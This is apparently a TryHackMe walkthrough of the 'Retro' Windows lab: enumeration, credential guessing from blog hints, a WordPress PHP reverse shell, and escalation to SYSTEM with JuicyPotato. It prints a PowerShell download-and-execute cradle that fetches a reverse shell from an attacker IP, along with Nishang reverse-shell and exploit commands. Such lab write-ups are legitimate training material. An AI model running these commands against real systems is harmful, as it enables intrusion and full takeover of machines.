TryHackMe WalkThrough — Retro
During my journey to finish the Offensive Pentesting path on TryHackMe, I had to hack the several machines. This walkthrough is for Retro, a Windows based machine.
All flags and hashes will be redacted in order to prevent an easy win of the room. You can find the room here.
Enumeration
We get a warning right in the description of the task stating that the machine doesn’t respond to ICMP requests. Taking that into consideration, let’s start by running our nmap on our target with the flag -Pn:
As we can see, the machine name is RETROWEB and we have 2 ports open:
- Port 80 — Web server running IIS
- Port 3389 — RDP access
As usually, I tend to add an entry to /etc/hosts and use the machine’s name instead of the IP address whenever possible:
echo "10.10.13.117 retroweb" | sudo tee -a /etc/hosts
Let’s check if we can find any web page on the target:
We get a default IIS web page so it is time to run gobuster and see what hidden directories we can find in the server:
We can now answer the question “A web server is running on the target. What is the hidden directory which the website lives on?” with “/retro”.
By having a look into the site, we can see it is some kind of blog related to retro games, books and movies:
By checking our Wappalyzer plugin, we can see that the server is running Wordpress version 5.2.1:
Also a new gobuster search in the retro directory finds another set of Wordpress related directories:
So let’s head to the wp-login.php page and see if we can find some credentials:
In Wordpress login pages, you can try different usernames and passwords and Wordpress will warn you, by default, if the password is wrong for that username, allowing a manual user enumeration. You can also use that to brute force your way, with something like Hydra. Usually I try to not brute force login pages unless I am really stuck in the machine for a while (as sometimes it is the intended path).
So after trying the default username and password, I’ve decided to head to the blog looking for clues, and found something that could give us a way in:
So in here, ‘Wade’ mentions that this is its favorite book of all time, specially because his name is the same as the main protagonist. In the movie/book, Wade’s avatar was ‘parzival’, so let’s try the ‘wade’:’parzival’ combo for credentials:
At this time, I remember that there is an RDP port open so let’s try the same credentials in the machine before doing anything else in Wordpress:
After logging in, we can see the user.txt in the Desktop and get the first flag. We can now answer the question “user.txt” with the new found flag.
Privilege Escalation
Let’s begin by checking systeminfo and the groups and permissions we have with the ‘Wade’ user:
Usually if the machine is a Windows 10 with version 1809 or higher, or a Windows Server 2019, we can use something like Rogue Potato attack to escalate privileges. Otherwise, we can try a Juicy Potato attack. I am not going to enter into details regarding this type of attack, but in order for it to be possible, we need a low privilege account with one of the following privileges:
- ‘SeImpersonatePrivilege’
- ‘SeAssignPrimaryTokenPrivilege’.
So we conclude that the machine is running Windows Server 2016 and the user doesn’t have privileges to leverage our access to SYSTEM using something like a Potato privilege escalation attack.
After a while of enumerating services and programs, I remember that we still have the Wordpress access and maybe the account that it is running the webserver is a different one and has different privileges.
We start by logging in into Wordpress and creating a reverse shell in one of the page templates (you can set a reverse shell for Windows/PHP like this):
Don’t forget to change the IP address and port for the ones you are going to use (IP address should be the one assigned to you when connecting to TryHackMe VPN). After editing the file, we need to open a netcat listener on our machine before refreshing the edited page:
After refreshing the page, we should have our reverse shell popping up in our machine:
Let’s start by checking what user is this and what privileges does it have:
As we can see, the user retro has the ‘SeImpersonatePrivilege’ enabled that we need to leverage our access to SYSTEM so let’s try to use a Juicy Tomato attack on this one.
I tend to make a directory to perform my attacks, specially because it is easier to clean afterwards if needed. So let’s make a temp directory in the ‘C:\’:
cd C:\
mkdir temp
cd temp
So first we need to download our exploit. We can get the latest version here. After downloading this into our machine, we need to transfer it into the server. Lets open a Python Http server and download it from the other side using PowerShell.
On our machine we run this Python module on the directory where we have our exploit:
sudo Python3 -m http.server 80
And we should be able to access our web server using our IP address:
Now we head to our server, start PowerShell and get the exploit into our newly created directory using the following command:
Invoke-WebRequest <resource_to_download> -outfile <output_file_name>
After downloading the exploit, let’s see if we can run it in the machine:
Perfect! This will allow us to run executables as a SYSTEM level process, so we also need something to execute with the JuicyPotato executable. In this case, we can just use another Reverse Shell that will pop a SYSTEM shell on our side.
We can create one with MSFVenom or download one specific for this case, like the Nishang reverse shell from here.
So lets download the Invoke-PowerShellTcp.ps1 from the Shells directory and save it on our machine. Additionally, lets add a new line in the end of the file, containing the following command, replacing the IP and Port with our own:
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>
Now lets get our reverse shell on the server using the same procedure:
Now we just need something executable, to execute our reverse shell and get a shell with SYSTEM privileges on our side. Lets create a .bat file and download it in the server using the same method. The .bat file should have the following code, with the IP replaced by our own IP address:
PowerShell “IEX(New-Object Net.WebClient).downloadString(‘http://<IP>/rshell.ps1')"
Now we need to download it into the server, using Invoke-WebRequest:
And now we just need to open a netcat listener on our side, on a different port that the one we are currently using in this shell:
The flow of this attack is something like this:
- The JuicyPotato exploit runs the .bat file as SYSTEM
- The .bat file with SYSTEM privileges downloads our Nishang reverse shell and executes it
- We get a SYSTEM shell on our side by using a netcat listener
So lets try our attack and see if we get a SYSTEM shell on our side. We can use the JuicyPotato like this:
.\j.exe -t * -p <path_to_executable.bat> -l 9002
Now we can just head to the Administrator Desktop and grab our root flag!
We can now answer the question “root.txt” with the new found root flag.
Overall, this machine was fun to solve. It is classified as a hard machine, but i think it is more of a medium difficulty.
I hope you enjoyed reading this post as much as I enjoyed writing it. Let me know in the comments if something is wrong or missing, as I am still learning myself and feedback is always welcomed :)